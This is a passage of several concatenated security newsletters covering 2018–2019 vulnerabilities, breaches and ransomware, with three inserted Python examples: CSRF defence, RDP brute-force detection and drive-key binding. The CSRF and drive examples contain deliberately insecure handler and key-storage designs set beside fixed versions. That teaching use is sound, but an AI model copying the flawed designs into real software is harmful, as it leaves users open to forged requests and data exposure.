Our monthly Information Security Report includes a summary of security breaches, threats and vulnerabilities. It is designed to help you gain visibility over the latest events and to help you assess their implications for your environment.

Shearwater Security Report | July 2019


Our monthly Security Report highlights some of the recent cybersecurity threats making headlines around the world.

Compiled by Shearwater’s experienced cybersecurity professionals, this report identifies new attack vectors used by cybercriminals, and helps you stay one step ahead of the attackers.

In this report we feature:

· Firefox – critical vulnerability uncovered by targeted attacks

· BlueKeep – could it be the next WannaCry?

· Up to 57% of email at risk 

· Cisco patch to stop online forgery

· Not so sunny in the Sunshine State

· Threats from within can be devastating too

· LooCipher – doing the work of the devil 

· Now criminals adopt security measures too 

Current Threats and Exploits

· Firefox critical vulnerability uncovered by targeted attacks

After uncovering a bug that can be exploited to give attackers remote code execution, Mozilla moved quickly to address the critical vulnerability by issuing a patch. The bug, which would still require a separate sandbox escape, could also be exploited for universal cross-site scripting.

According to Mozilla, the vulnerability (CVE-2019-11707) “can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash.”

The vulnerability has been fixed in Firefox 67.0.3 and Firefox ESR 60.7.1.(1)

· BlueKeep – could it be the next WannaCry?

It’s been two years since WannaCry. The indiscriminate virus spread like wildfire, infecting almost a quarter of a million computers globally back in 2017. It all started when someone unwittingly opened an infected email attachment.

Now there’s the potential for an even more devastating attack.

A vulnerability, known as BlueKeep (CVE-2019-0708) exists within the Remote Desktop Protocol (RDP) used by the Microsoft Windows operating system. An attacker can exploit this vulnerability to perform remote code execution on an unprotected system.

While Microsoft has already issued a patch to repair the vulnerability, it is believed many systems are still at risk.

According to Microsoft, an attacker can send specially crafted packets to an affected operating system that has RDP enabled. After successfully sending the packets, the attacker would have the ability to perform a number of actions including:

    • Adding accounts with full user rights;
    • Viewing, changing, or deleting data; or
    • Installing programs.

Exploitation requires no user interaction and takes place before authentication.

BlueKeep is considered “wormable” because malware exploiting this vulnerability on a system could propagate to other vulnerable systems. Thus, there’s a very real risk a BlueKeep exploit would be capable of rapidly spreading in a fashion similar to the WannaCry malware attacks of 2017.(2)

· Up to 57% of email at risk 

“Return of the WIZard” is a vulnerability allowing hackers to send malicious email to Exim software. Exim is a popular email server software, or message transfer agent (MTA), used to send and receive email. With an estimated 57% of email servers operating Exim software, there is an acute risk of email disruption from the vulnerability.

According to Microsoft, an active Linux worm is targeting Exim. The worm allows attackers to remotely execute commands on a vulnerable server.

It is known there are at least two groups of hackers seeking to exploit the vulnerability to run malicious code. Hackers have also downloaded and installed a cryptocurrency miner on compromised servers.

While a mitigation is already in place to block the worm, Microsoft states that Azure servers with Exim software can still be infected or hacked.

The vulnerability (CVE-2019-10149) was discovered in Exim 4.87 to 4.91.

If not stopped, the worm would use the infected server to search for other vulnerable hosts to infect. Anyone using an email server with Exim software should install the latest patches as soon as possible.(3)

· Cisco patch to stop online forgery

We all log in to a variety of online accounts daily.

Whether it’s email, online banking, e-commerce, or any other type of online account we access through a web page or app, we expect that once we enter our username and password, we can transact safely.

However, hackers can leverage a “cross-site request forgery” (CSRF) flaw to force the execution of unwanted actions in web pages or apps, even once we have already been authenticated by logging in.

These attacks can be deployed via a malicious link, and the action is executed with the same privileges as the logged-in user.

Cisco recently identified a vulnerability (CVE-2019-1904) that affects outdated versions of Cisco IOS XE. The vulnerability is in the web-based user interface of the product and is due to insufficient CSRF protections on an affected device.

To rectify the problem, Cisco released an updated version of its IOS XE software to patch the CSRF vulnerability.(4)
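As an added illustration of the CSRF mechanism described above (example code written for this report, not Cisco’s code or anything from the IOS XE web interface; the origin `https://mgmt.example`, the in-memory session store and the request shapes are assumptions), the following Python models a password-change handler that trusts the session cookie alone, next to the same handler with an Origin check and a per-session synchronizer token:

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional
from urllib.parse import urlsplit

# Origin of a hypothetical device management UI (assumed value, not from the report).
SITE_ORIGIN = "https://mgmt.example"

# Constructed in-memory session store: session id -> session state.
SESSIONS: Dict[str, dict] = {}


def new_session(user: str) -> str:
    """Log a user in: issue a random session id and a random per-session CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32), "password": "initial"}
    return sid


@dataclass
class Request:
    """Only the parts of an HTTP request that the checks below look at."""
    cookies: Dict[str, str] = field(default_factory=dict)
    headers: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)


def _session_for(req: Request) -> Optional[dict]:
    return SESSIONS.get(req.cookies.get("sid", ""))


def vulnerable_change_password(req: Request) -> int:
    """Flawed handler: the session cookie alone authorises the state change.
    A browser attaches that cookie to a request submitted by a page on any other
    origin, so the action runs with the logged-in user's privileges."""
    sess = _session_for(req)
    if sess is None:
        return 401
    sess["password"] = req.form.get("new_password", "")
    return 200


def _origin_of(value: str) -> str:
    parts = urlsplit(value)
    return f"{parts.scheme}://{parts.netloc}".lower()


def hardened_change_password(req: Request) -> int:
    """Same handler with two independent CSRF defences."""
    sess = _session_for(req)
    if sess is None:
        return 401
    # Defence 1: the browser-set Origin header (or Referer as a fallback) must equal our
    # own origin. Compare whole origins, not prefixes, so "https://mgmt.example.evil" fails.
    source = req.headers.get("Origin") or req.headers.get("Referer", "")
    if _origin_of(source) != SITE_ORIGIN:
        return 403
    # Defence 2: synchronizer token bound to the session and compared in constant time.
    # A page on another origin cannot read the token and so cannot include it.
    supplied = req.form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, sess["csrf"]):
        return 403
    sess["password"] = req.form.get("new_password", "")
    return 200


def cross_site_request(sid: str) -> Request:
    """What the server receives when a page on another origin submits a form while the
    user is logged in: session cookie present, foreign Origin, no token."""
    return Request(cookies={"sid": sid},
                   headers={"Origin": "https://third-party.example"},
                   form={"new_password": "chosen-elsewhere"})


def same_site_request(sid: str) -> Request:
    """A genuine submission from our own UI, which embedded the token in the form."""
    return Request(cookies={"sid": sid},
                   headers={"Origin": SITE_ORIGIN},
                   form={"csrf_token": SESSIONS[sid]["csrf"], "new_password": "user-chosen"})


def demo() -> Dict[str, int]:
    """Run both handlers against a forged and a genuine request for one session."""
    sid = new_session("admin")
    return {
        "vulnerable_cross_site": vulnerable_change_password(cross_site_request(sid)),  # 200
        "hardened_cross_site": hardened_change_password(cross_site_request(sid)),      # 403
        "hardened_same_site": hardened_change_password(same_site_request(sid)),        # 200
    }


if __name__ == "__main__":
    print(demo())
```

Setting the session cookie with the `SameSite` attribute is a third, complementary layer; the two server-side checks above are the ones that do not depend on browser support.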



Recent Breaches

· Not so sunny in the Sunshine State

Florida may be America’s Sunshine State, but recently things have been looking pretty gloomy.

Lake City, Florida is finally recovering from a devastating Triple Threat ransomware attack that knocked out its email and online payment systems on June 10, according to City Manager, Joe Helfenberger.

Cloud cybersecurity company, AppRiver, initially reported the Triple Threat back in January.  However, at the time they only mentioned it was a phishing scheme designed to gather credentials and did not indicate there was a ransomware component to it.

Lake City updated its status on June 12, saying that while most systems were still down, progress was being made to restore the network and regain access to the locked data.

Luckily, systems used by the city’s police, fire and other emergency services were not impacted.

Eventually, city authorities reportedly paid $460,000 in Bitcoin to the attackers to recover their data and systems. This attack serves as yet another warning why backups are so important for recovery after a ransomware attack.(5)

· Threats from within can be devastating too

Desjardins Group is the largest federation of credit unions in North America.

As custodians for so much confidential information, including the personal and financial records of roughly 2.9 million Desjardins Group members, data security is paramount.

Yet despite systems in place to prevent unauthorised intrusions, data was leaked by an employee who disclosed it to people outside the organisation without permission.

According to a statement by Desjardins, the information disclosed includes:

  • First and last names;
  • Dates of birth;
  • Social insurance numbers;
  • Addresses;
  • Phone numbers;
  • Email addresses; and
  • Details of banking habits and Desjardins products.

Awareness of the data leak emerged on June 14, when local police “provided Desjardins with information confirming that the personal information of more than 2.9 million members (including 2.7 million personal members and 173,000 business members) had been disclosed to individuals outside the organization.”

This is a timely warning that measures to prevent outside intrusion may not do anything to protect you from malicious actions undertaken by those inside your organisation.(6)



Other News

· LooCipher – doing the work of the devil 

LooCipher, the newly discovered ransomware that encrypts all files on an infected computer and demands a ransom payment of 300 Euros within five days, is pure evil.

The ransomware is spread by a spam campaign that delivers a Word document called Info_BSV_2019.docm. Once the document is opened and its macros are enabled, the macro connects to a Tor server and downloads an .exe file.

During this time, all the computer’s files are encrypted and cannot be read, but they are not deleted. If the ransom is not paid via Bitcoin within five days, all your documents will be permanently destroyed.

This is another reminder that you should never open attachments in emails that you do not recognise.(7)

· Now criminals adopt security measures too 

The “S” in “HTTPS” stands for “SECURE”.

That letter signals to visitors that the site is secure for communications and that the privacy and integrity of data exchanged on the site is protected. It helps prevent “man-in-the-middle” attacks.

However, as attackers become more sophisticated, they too are beginning to use HTTPS sites for their malicious activities.

With the adoption of cryptographic protocols for secure website communications, cybercriminals are moving to HTTPS to keep their operations afloat.

Over half of phishing websites detected in the first quarter of this year used digital certificates to encrypt the connections from the visitor. This is a trend that has been growing since mid-2016.

HTTPS is designed to protect user privacy by encrypting the traffic between a server and the browser. This prevents third parties from viewing the data that’s exchanged. As web browsers began warning users that their connection was not secure if the site wasn’t HTTPS, phishing scammers began following the HTTPS trend.

Nowadays, presenting an HTTPS website is virtually impossible without a certificate for Transport Layer Security (TLS), the cryptographic protocol designed to provide communications security over a computer network. While obtaining a TLS certificate was complicated and expensive in the past, these days one can be obtained for free.

With TLS certificates now more easily accessible, scammers are accessing them to give their websites the appearance of being secure.

It’s another reminder that when transacting online, all is not what it seems.(8)


To stay secure, you need to be proactive.

Cybercriminals are constantly looking for ways to exploit vulnerabilities and will use any opportunity to circumvent your security systems.

Keep on top of the latest advances in cybersecurity and ensure your organisation stays ahead of the threats with Shearwater’s team of expert consultants.

Together, we’ll develop a comprehensive security roadmap for your organisation that takes into account your specific needs and circumstances.

Take the first step towards enhancing your security and speak with us today.


(1) https://www.darkreading.com/attacks-breaches/critical-firefox-vuln-used-in-targeted-attacks/d/d-id/1335011
(2) https://www.us-cert.gov/ncas/alerts/AA19-168A
(3) https://www.bleepingcomputer.com/news/microsoft/microsoft-warns-about-worm-attacking-exim-servers-on-azure/
(4) https://www.bleepingcomputer.com/news/security/cisco-ios-xe-software-receives-fix-against-high-severity-flaw/
(5) http://www.scmagazine.com/home/security-news/ransomware/lake-city-recovering-from-ransomware-attack/
(6) https://www.bleepingcomputer.com/news/security/desjardins-group-data-leak-exposes-info-of-29-million-members/
(7) https://www.bleepingcomputer.com/news/security/new-loocipher-ransomware-spreads-its-evil-through-spam/
(8) https://www.bleepingcomputer.com/news/security/phishing-websites-increase-adoption-of-https/



This Information Security Report is brought to you by Shearwater Solutions

The Information Security Report is a monthly summary, compiled by Shearwater’s experienced cybersecurity professionals, to highlight the vulnerabilities and new attack vectors in some of the latest active threats, exploits and breaches and share recommendations to help you protect your data and stay a step ahead.

Whatever your Information Security challenge, we’re here to help you find the right solution.

April 2019 Security Report | Shearwater Solutions


Featured in this report: ASUS releases a critical software update to combat the “ShadowHammer” Trojan malware; Cisco’s RV320 and RV325 small business routers are vulnerable to attack; zero-day vulnerabilities found in Google Chrome and Microsoft Windows are being exploited together; the recent WinRAR vulnerability is being abused en masse by threat actors; Adobe patches ColdFusion to remove a vulnerability; and Apple patches a number of serious vulnerabilities in its iOS platform. The latest data breach news includes between 6TB and 10TB of data extracted from Citrix’s internal network and a second Toyota data breach that has leaked up to 3.1 million pieces of customer data. In other news, Windows 7 and Windows Server 2008 R2 support will cease in January 2020.

Current Threats and Exploits


  • ASUS malware software update:
    A critical software update has been released by ASUS to combat a Trojan malware attack known as “ShadowHammer”; the attack itself was disguised as a “critical” software update. Although ASUS stated that “only a small number of a specific user group was found to be targeted,” Kaspersky Lab estimates that the attack could have been distributed to nearly 1 million machines and installed on hundreds of thousands. Along with the software patch, ASUS also introduced a “Live Security” tool that users can run to check whether their device has been involved in any known malware attacks. (1)
  • Cisco vulnerability patching:
    Cisco Systems issued 24 patches for vulnerabilities in its IOS XE operating system and warned customers that two small business routers (RV320 and RV325) are vulnerable to attack with no patches available for either. Cisco rated 19 of the bugs as “high severity” and the rest as medium. The two router vulnerabilities, also rated “high severity”, affect Cisco’s Dual Gigabit WAN VPN RV320 and RV325 line of small business routers. Both router flaws were first patched in January; however, Cisco said that both patches were “incomplete” and that both routers remained vulnerable. Firmware updates that address these vulnerabilities are not currently available, and Cisco says there are no workarounds for either. (2)
  • Google Chrome Zero Day Exploit:
    Google has patched two previously undisclosed vulnerabilities, one in Google Chrome and another in Microsoft Windows, that were being exploited together. Google released an update for all Chrome platforms, delivered through the auto-update feature. The Chrome vulnerability is a memory-management bug that could allow remote code execution, letting an unauthorized attacker run malicious code. Google has encouraged all Chrome users to verify that auto-update has applied version 72.0.3626.121. (3)
  • WinRAR ACE file extension:
    WinRAR is a widely used file archival tool. Users should update to the latest version of WinRAR, or remove it from their computer, as the software has no automatic update feature. Shearwater recommends checking whether WinRAR is installed on devices in the network. If WinRAR is discovered and it is verified to be required, it is critical that the latest version is installed. If WinRAR is not required, the software should be removed. (4)
  • Adobe ColdFusion Exploits:
    Adobe has released a patch for its ColdFusion web development platform to remove a vulnerability that could allow a remote attacker to execute arbitrary code. The vulnerability allows an attacker to upload a file of their choosing and then cause any code within the file to be executed by issuing an HTTP request. All previous versions of ColdFusion are reported to be vulnerable, and anyone using ColdFusion should update to the latest version as soon as possible. Attacks against the vulnerability have already been observed. (5)
  • Apple Patches a Number of Serious Vulnerabilities in iOS
    Apple recently released a patch to fix a number of serious vulnerabilities discovered in its WebKit framework, which is used by browsers on the iOS platform. The vulnerabilities range in severity, but at worst they allow a specially crafted web page to execute arbitrary code. It is recommended that all users of iOS devices update to the latest version of iOS as soon as possible. (6)


It is important that all users install the latest updates to stay protected from security threats.

Recent Breaches


  • Major Citrix Data Breach:
    Citrix recently released information indicating that it had suffered a major data breach in which malicious actors gained access to its internal network. Forensic analysis determined that the breach was performed by a sophisticated attacker, who is thought to have extracted between 6TB and 10TB of data from the internal Citrix network, including business documents with details of several of Citrix’s clients. It was also revealed that the attackers likely gained access to the environment by brute force: several employees’ accounts secured with weak passwords were compromised. This breach, like a number of other recent breaches, reinforces the need to ensure all users have strong passwords and two-factor authentication enabled on their accounts. (7)
  • Second Toyota Data Breach:
    Toyota has apologized to customers after a large data breach at its Tokyo area sales network was discovered on 21st March. Toyota said unauthorized network access to a server used by sales subsidiaries may have leaked up to 3.1 million pieces of customer data outside the company. Toyota is still investigating the extent of the data breach, and whether or not the information was exfiltrated. In late February this year, Toyota Australia suffered a cyber-attack that took out its email service and other systems. Toyota has not attributed either of these hacks to any particular actor or group, or advised whether the two are connected. (8)

Other News


  • End of Windows 7 and Windows Server 2008 R2 support:
    Starting on 18th April 2019, users running Windows 7 will start seeing pop-ups reminding them that support for the aging operating system will end in mid-January 2020. Reasons users may have for not upgrading to Windows 10 include concerns about applications not working and computers that cannot run Windows 10. Users with an enterprise license can arrange continued support for some business Windows 7 installations, and users with embedded Windows 7 may have different life cycle dates. (9)

References

  1. Asus software updates were used to spread malware, security group says
  2. Cisco Releases Flood of Patches for IOS XE, But Leaves Some Routers Open to Attack
  3. Disclosing vulnerabilities to protect users across platforms
  4. ‘100 unique exploits and counting’ for latest WinRAR security bug
  5. Security updates available for ColdFusion | APSB19-14
  6. Latest iOS 12.2 Update Patches Some Serious Security Vulnerabilities
  7. Citrix discloses security breach of internal network
  8. Millions of customers’ data accessed in second Toyota hack
  9. Windows 7 Update Support Ends One Year From Today


December 2018 Security Report | Shearwater Solutions


Featured this month: Exposed Remote Desktop connections create a soft target for attackers, email distribution platforms are increasingly being hijacked to facilitate mass phishing campaigns, several Self-Encrypting Drives have multiple vulnerabilities, a VirtualBox zero-day vulnerability, breaches that caused inconvenience for Dell, created danger and disruption for an Ohio hospital and exposed over 500,000 guests’ data in a breach dating back to 2014 for the Marriott hotel chain. In other news, a Windows 10 (1703 and newer) update allows Windows Defender to operate in a sandboxed environment, and Google’s QUIC protocol will replace TCP, offering both compression and encryption, in the next revision of the HTTP protocol.

Current Threats and Exploits


  • Exposed Remote Desktop connections create soft target for attackers:
    Remote Desktop provides a convenient tool for remote administration and for users to access internal resources. It is also commonly scanned for, and targeted by, attackers attempting to gain unauthorized access to internal networks. Typically an attacker will look to gain access to the remote desktop host, whether by brute forcing accounts or by using known credentials harvested via phishing or breach data, before launching subsequent attacks inside the network (e.g. ransomware, cryptomining or data exfiltration).
    To avoid falling victim, it is important that exposed Remote Desktop Protocol (RDP) and other services are appropriately hardened. Simple steps such as geoblocking, good password practices and monitoring of external-facing hosts can significantly increase the difficulty of entry for attackers trying to take over your RDP host this holiday season.
  • Marketing email campaign hijacking leads to mass distribution of phishing:
    Shearwater has identified a number of incidents where a company’s marketing or email distribution platforms have been compromised in order to facilitate mass phishing campaigns. Through Business Email Compromise (BEC), attackers are frequently looking to gain access to platforms such as MailChimp that are prepopulated with recipient lists. This provides an easy opportunity to further phish unsuspecting victims.
    If you are unsure of the source of an email, a simple phone call to the sender or your IT security team can help validate the contents in a timely fashion. And if you identify a phishing campaign of this nature, contacting the mail platform and sender to alert them to the incident is also recommended.
  • Self-Encrypting Drives have multiple vulnerabilities:
    There are multiple vulnerabilities in implementations of ATA Security or TCG Opal Standards in Self-Encrypting Disks (SEDs), which can allow an attacker to decrypt contents of an encrypted drive. There is no cryptographic relation between the password provided by the end user and the key used for the encryption of user data. This allows an attacker to access the key without knowing the password provided by the end user, allowing the attacker to decrypt information encrypted with that key. According to the National Cyber Security Centre – The Netherlands (NCSC-NL), the following products are affected by CVE-2018-12037:

    • Crucial (Micron) MX100, MX200 and MX300 drives
    • Samsung T3 and T5 portable drives
    • Samsung 840 EVO and 850 EVO drives (In ATA high mode these devices are vulnerable, in TCG or ATA max mode these devices are not vulnerable.)

The vendors have issued patches to address the vulnerabilities. We recommend that you update to the latest patches as soon as possible.
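As an added example for the Remote Desktop item above (written for this report, not a tool Shearwater describes), the following Python runs a brute-force and password-spray check over a few constructed log lines rendered in a simplified one-line form of Windows Security events 4625 (failed logon) and 4624 (successful logon); the line format, the thresholds and the TEST-NET addresses are assumptions, and LogonType 10 is the RemoteInteractive type that RDP sessions produce:

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample: a one-line rendering of the 4625/4624 fields a SIEM would
# extract. The first source tries five different accounts in under a minute and
# then succeeds; the second is an ordinary user mistyping once; the last two
# lines are non-RDP logon types and should be ignored by an RDP-specific check.
SAMPLE_LOG = """\
2018-12-07T01:00:05Z 4625 LogonType=10 Account=administrator Source=203.0.113.45
2018-12-07T01:00:09Z 4625 LogonType=10 Account=admin Source=203.0.113.45
2018-12-07T01:00:14Z 4625 LogonType=10 Account=backup Source=203.0.113.45
2018-12-07T01:00:20Z 4625 LogonType=10 Account=scanner Source=203.0.113.45
2018-12-07T01:00:27Z 4625 LogonType=10 Account=helpdesk Source=203.0.113.45
2018-12-07T01:00:33Z 4624 LogonType=10 Account=helpdesk Source=203.0.113.45
2018-12-07T01:02:10Z 4625 LogonType=10 Account=jsmith Source=198.51.100.7
2018-12-07T01:02:31Z 4624 LogonType=10 Account=jsmith Source=198.51.100.7
2018-12-07T01:05:00Z 4625 LogonType=2 Account=jsmith Source=-
2018-12-07T01:05:05Z 4625 LogonType=3 Account=svc_sql Source=192.0.2.9
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<event>\d{4}) LogonType=(?P<ltype>\d+) "
    r"Account=(?P<acct>\S+) Source=(?P<src>\S+)$"
)

RDP_LOGON_TYPE = "10"            # RemoteInteractive
WINDOW = timedelta(minutes=5)    # sliding window per source address (assumed tuning)
FAIL_THRESHOLD = 5               # failures within WINDOW that raise an alert
SPRAY_THRESHOLD = 3              # distinct accounts within the burst => spraying, not guessing


def parse(log: str) -> List[dict]:
    """Turn the constructed lines into dicts; silently skip anything that does not match."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "event": m["event"], "ltype": m["ltype"],
            "acct": m["acct"], "src": m["src"],
        })
    return events


def detect_rdp_bruteforce(log: str) -> Dict[str, List[str]]:
    """Return {source address: [alert, ...]} for RDP logon activity in `log`.

    Two patterns are reported: a burst of failures from one source (labelled as a
    spray when it spans several accounts), and a success from a source that is
    still inside such a burst, which is the event worth paging someone for."""
    alerts: Dict[str, List[str]] = defaultdict(list)
    recent: Dict[str, deque] = defaultdict(deque)   # src -> (ts, account) failures in WINDOW
    burst_reported = set()
    for ev in parse(log):
        if ev["ltype"] != RDP_LOGON_TYPE:
            continue
        q = recent[ev["src"]]
        while q and ev["ts"] - q[0][0] > WINDOW:   # expire failures older than WINDOW
            q.popleft()
        if ev["event"] == "4625":
            q.append((ev["ts"], ev["acct"]))
            if len(q) >= FAIL_THRESHOLD and ev["src"] not in burst_reported:
                burst_reported.add(ev["src"])
                accounts = {acct for _, acct in q}
                kind = "password spray" if len(accounts) >= SPRAY_THRESHOLD else "brute force"
                alerts[ev["src"]].append(
                    f"{kind}: {len(q)} RDP failures against {len(accounts)} account(s) within {WINDOW}")
        elif ev["event"] == "4624" and len(q) >= FAIL_THRESHOLD:
            alerts[ev["src"]].append(
                f"success for {ev['acct']} after {len(q)} recent failures: possible compromise")
    return dict(alerts)


if __name__ == "__main__":
    for src, msgs in detect_rdp_bruteforce(SAMPLE_LOG).items():
        for msg in msgs:
            print(src, msg)
```

Real deployments read these fields from the Security event log or a SIEM rather than a text rendering, and the window and thresholds need tuning against the normal failure rate of the hosts being watched; the structure of the check (per-source sliding window, distinct-account count, success-after-burst) carries over unchanged.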

  • VirtualBox Zero Day vulnerability:
    A new vulnerability has been discovered in VirtualBox’s Intel E1000 NIC driver code when it is operating in NAT mode. The vulnerability, which affects all versions of VirtualBox up to and including 5.2.20, allows malicious code running in a guest VM to gain application-level control over the host. To make matters worse, the vulnerable code is shared between a number of different guest operating systems, meaning that it can be exploited from almost any guest. The vulnerability was not responsibly disclosed, and therefore there is currently no patch available.
    We recommend that users of VirtualBox change the type of virtual network adapter to something other than the Intel E1000, or place it into a mode other than NAT. (1)
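As an added example for the Self-Encrypting Drives item above (illustrative code written for this report, not any vendor’s firmware), the following Python contrasts a controller design in which the password only gates an unlock check while the data-encryption key (DEK) sits in storage independently of it, with a design in which a key-encryption key (KEK) derived from the password wraps the DEK, so that reading the controller’s storage without the password yields nothing usable. The HMAC-based wrap here is a stand-in for AES Key Wrap; the field names and KDF parameters are assumptions:

```python
import hashlib
import hmac
import secrets
from typing import Optional

KDF_ITERATIONS = 100_000   # assumed tuning; the point is that the KEK depends on the password
KEY_LEN = 32


def derive_kek(password: str, salt: bytes) -> bytes:
    """KEK derived from the user's password; it cannot be recomputed without the password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, KDF_ITERATIONS, dklen=KEY_LEN)


def wrap(dek: bytes, kek: bytes) -> bytes:
    """Toy authenticated wrap of a 32-byte DEK under the KEK (stand-in for AES Key Wrap):
    nonce || (DEK XOR HMAC(kek, nonce)) || HMAC tag over nonce and ciphertext."""
    if len(dek) != KEY_LEN:
        raise ValueError("DEK must be 32 bytes")
    nonce = secrets.token_bytes(16)
    stream = hmac.new(kek, b"wrap" + nonce, "sha256").digest()
    ct = bytes(a ^ b for a, b in zip(dek, stream))
    tag = hmac.new(kek, b"tag" + nonce + ct, "sha256").digest()
    return nonce + ct + tag


def unwrap(blob: bytes, kek: bytes) -> Optional[bytes]:
    """Inverse of wrap(); returns None if the KEK is wrong or the blob was altered."""
    nonce, ct, tag = blob[:16], blob[16:16 + KEY_LEN], blob[16 + KEY_LEN:]
    expected = hmac.new(kek, b"tag" + nonce + ct, "sha256").digest()
    if not hmac.compare_digest(expected, tag):
        return None
    stream = hmac.new(kek, b"wrap" + nonce, "sha256").digest()
    return bytes(a ^ b for a, b in zip(ct, stream))


def flawed_provision(password: str, dek: bytes) -> dict:
    """The flaw class in the advisory: the password is verified, but the DEK that actually
    encrypts user data is stored on its own, with no cryptographic dependence on it."""
    salt = secrets.token_bytes(16)
    return {"salt": salt, "password_check": derive_kek(password, salt), "dek": dek}


def flawed_unlock(storage: dict, password: str) -> Optional[bytes]:
    if hmac.compare_digest(derive_kek(password, storage["salt"]), storage["password_check"]):
        return storage["dek"]
    return None


def bound_provision(password: str, dek: bytes) -> dict:
    """Correct binding: only the wrapped DEK is persisted; the KEK is never stored."""
    salt = secrets.token_bytes(16)
    return {"salt": salt, "wrapped_dek": wrap(dek, derive_kek(password, salt))}


def bound_unlock(storage: dict, password: str) -> Optional[bytes]:
    return unwrap(storage["wrapped_dek"], derive_kek(password, storage["salt"]))


def dek_stored_in_clear(storage: dict, dek: bytes) -> bool:
    """Models reading the controller's persistent storage without the password:
    does the DEK appear in it as-is?"""
    return any(isinstance(v, bytes) and v == dek for v in storage.values())


if __name__ == "__main__":
    dek = secrets.token_bytes(KEY_LEN)
    print("flawed design exposes DEK:", dek_stored_in_clear(flawed_provision("pw", dek), dek))
    print("bound design exposes DEK: ", dek_stored_in_clear(bound_provision("pw", dek), dek))
```

The unlock path looks identical to the user in both designs; the difference is only visible to someone who bypasses the password check and reads the controller directly, which is exactly the case the advisory describes.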

Recent Breaches



A data breach at Marriott hotel chain has exposed personal details of up to 500,000 guests.

  • Dell resets all customer passwords after cyberattack:
    Dell suffered a security breach on November 9, 2018. Hackers succeeded in breaching the company’s network but were detected and stopped. Investigators found no evidence that the hackers succeeded in extracting data, but they have not ruled out the possibility that some data was stolen. Analysis of the attack concluded the attackers were seeking customer names, email addresses and scrambled passwords.
    We recommend that Dell customers are vigilant for suspicious emails or account activity. (2)
  • Ransomware attack forced Ohio hospital system to divert ER patients:
    A malware infection and ransomware attack that hit computer systems at the East Ohio Regional Hospital and Ohio Valley Medical Center over the Thanksgiving weekend reportedly disrupted the hospitals’ emergency rooms, causing ambulances to be diverted to other area hospital emergency rooms. The attack hit on the evening of Friday, Nov. 23, leaving the hospitals temporarily unable to accept ER patients via emergency responders.
    A spokesperson for the hospitals said that there has been no patient information breach. (3)
  • Marriott’s massive data breach:
    The Marriott hotel chain has reported a massive data breach that was discovered to be related to a cyberattack dating back to 2014. The breach affected personal details of up to 500,000 guests of its Starwood brands, such as Westin, Sheraton, Le Meridien, St Regis and W Hotels. It is believed that personal information for around 327,000 reservations was exposed, including name, address, phone number, passport number and details of the stays. Credit card numbers and expiry dates of some guests may also have been taken. (4)

Other News


  • Windows Defender sandboxed:
    Current versions of Windows 10 (1703 and newer) have received an update that allows Windows Defender to operate in a sandboxed environment. Because anti-malware software requires complete visibility over the whole system to provide effective protection, it needs to run with very high privileges. As a result of these high privileges, anti-malware products have become a common target for malware and malicious actors, as a successful compromise could give them control over the system. To reduce the risk, Microsoft has isolated Windows Defender in a sandboxed environment, making it harder for a compromise of Windows Defender to take over the system.
    Sandboxing is not currently enabled by default in Windows. However, if users wish to enable it on their system, they can issue the following command from an administrator command prompt and restart their system “setx /M MP_FORCE_USE_SANDBOX 1”. (5)
  • HTTP 3 using UDP:
    The Internet Engineering Task Force (IETF) has stated that the next revision of the HTTP protocol will not use Transmission Control Protocol (TCP) for its transport layer connections, but Google’s QUIC (Quick UDP Internet Connections) protocol instead. QUIC, which itself operates using UDP, was originally designed by Google and provides both compression and encryption.
    When the new protocol becomes more widely used, firewall rules will need to permit UDP 443 connections. (6)

References

  1. Zero-Day Exploit Published for VM Escape Flaw in VirtualBox
  2. Dell.com resets all customer passwords after cyber attack: statement
  3. Ransomware Attack Forced Ohio Hospital System to Divert ER Patients
  4. Massive data breach at Marriott’s hotels exposes private data of 500,000 guests
  5. Windows Defender Antivirus can now run in a sandbox
  6. HTTP-over-QUIC to be renamed HTTP/3




WebEx, LibSSH Authentication & D-Link Router Vulnerabilities | Shearwater InfoSec Report



Featured this month: a WebEx vulnerability that allows a remote attacker to execute code on the machine, a LibSSH authentication vulnerability that allows a remote attacker to authenticate without valid credentials, three vulnerabilities in a number of D-Link routers which combine to allow a remote attacker to take over a device, a number of new Drupal code execution vulnerabilities and a Windows zero-day vulnerability. Recent breaches include Cathay Pacific and iNet, and in security news, the California government has passed a bill to mandate that manufacturers improve passwords on IoT devices.

Current Threats and Exploits


  • WebEx Remote Code Execution Vulnerability:
    A vulnerability has been discovered in Cisco’s WebEx web meeting and presentation client that would allow a remote attacker to execute code on the machine.
    We recommend that users patch their WebEx client software to version 33.6.0 to close this vulnerability. (1)
  • LibSSH Authentication Vulnerability:
    A new vulnerability has been discovered in the LibSSH package, which is used to add SSH support to devices. The vulnerability, assigned CVE-2018-10933, allows a remote attacker to present the server with a successful authentication message (SSH2_MSG_USERAUTH_SUCCESS) upon connecting, and the server will accept the message. As a result, the attacker can easily become authenticated to the device without needing to present valid credentials. The vulnerability is reported to exist in all versions of LibSSH after 0.6.
    Users of LibSSH are advised to upgrade to the latest versions, 0.8.4 and 0.7.6, which have been fixed to remove the authentication flaw.(2)
  • D-Link Routers Vulnerable External Control:
    Security researchers have identified three vulnerabilities in a number of D-Link routers which, when combined, allow a remote attacker to take control of the device. The first vulnerability allows an unauthenticated attacker to browse the file system of the router to obtain the password file. The second vulnerability results in the password file they obtain being stored in cleartext, giving them access to the raw passwords. Finally, the authenticated attacker can execute arbitrary code on the device, through the Web interface. As an attacker can obtain the raw passwords using the first two vulnerabilities, they can take over the device. D-Link was informed of the vulnerability back in May this year, however they have failed to release any patches.
    It is strongly advised that anyone using D-Link routers ensures they are not configured to allow access to their Web interface from the Internet. (3)
  • More Drupal Code Execution Vulnerabilities:
    A number of new remote code execution vulnerabilities have been discovered in the Drupal content management system. One of the most critical exists in the default mail backend, which does not check for shell arguments when processing emails, allowing injected shell arguments to be executed on the server.
